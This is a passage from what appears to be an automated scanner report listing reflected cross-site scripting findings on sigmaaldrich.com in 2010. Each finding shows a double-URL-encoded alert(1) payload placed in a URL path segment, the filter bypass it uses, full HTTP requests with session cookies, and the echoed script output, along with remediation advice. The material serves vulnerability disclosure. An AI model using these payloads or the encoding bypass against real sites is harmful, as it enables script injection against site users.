Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16baf%2522%253balert%25281%2529%252f%252f4955a060821 was submitted in the REST URL parameter 6. This input was echoed as 16baf";alert(1)//4955a060821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and/16baf%2522%253balert%25281%2529%252f%252f4955a060821/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:20 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28968


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and/16baf";alert(1)//4955a060821/baynote.js","E404") ;
   </script>
...[SNIP]...

1.427. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8269%2522%253balert%25281%2529%252f%252f6f5229b5869 was submitted in the REST URL parameter 1. This input was echoed as f8269";alert(1)//6f5229b5869 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcf8269%2522%253balert%25281%2529%252f%252f6f5229b5869/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:14 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcf8269";alert(1)//6f5229b5869/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.428. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 407c3%2522%253balert%25281%2529%252f%252f53850a8ac79 was submitted in the REST URL parameter 2. This input was echoed as 407c3";alert(1)//53850a8ac79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib407c3%2522%253balert%25281%2529%252f%252f53850a8ac79/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:17 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib407c3";alert(1)//53850a8ac79/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.429. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c69%2522%253balert%25281%2529%252f%252fd003cb44276 was submitted in the REST URL parameter 3. This input was echoed as e9c69";alert(1)//d003cb44276 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldriche9c69%2522%253balert%25281%2529%252f%252fd003cb44276/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:20 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldriche9c69";alert(1)//d003cb44276/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.430. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4153a%2522%253balert%25281%2529%252f%252fe13ad80bc0f was submitted in the REST URL parameter 4. This input was echoed as 4153a";alert(1)//e13ad80bc0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers4153a%2522%253balert%25281%2529%252f%252fe13ad80bc0f/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:23 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers4153a";alert(1)//e13ad80bc0f/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.431. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df8b0%2522%253balert%25281%2529%252f%252f5e392adb54a was submitted in the REST URL parameter 5. This input was echoed as df8b0";alert(1)//5e392adb54a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-anddf8b0%2522%253balert%25281%2529%252f%252f5e392adb54a/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:26 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-anddf8b0";alert(1)//5e392adb54a/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.432. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6e0%2522%253balert%25281%2529%252f%252f5815abce9b2 was submitted in the REST URL parameter 6. This input was echoed as 5f6e0";alert(1)//5815abce9b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and/5f6e0%2522%253balert%25281%2529%252f%252f5815abce9b2/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28977


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and/5f6e0";alert(1)//5815abce9b2/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.433. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa38%2522%253balert%25281%2529%252f%252fe4a284d9a4d was submitted in the REST URL parameter 1. This input was echoed as 3fa38";alert(1)//e4a284d9a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc3fa38%2522%253balert%25281%2529%252f%252fe4a284d9a4d/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
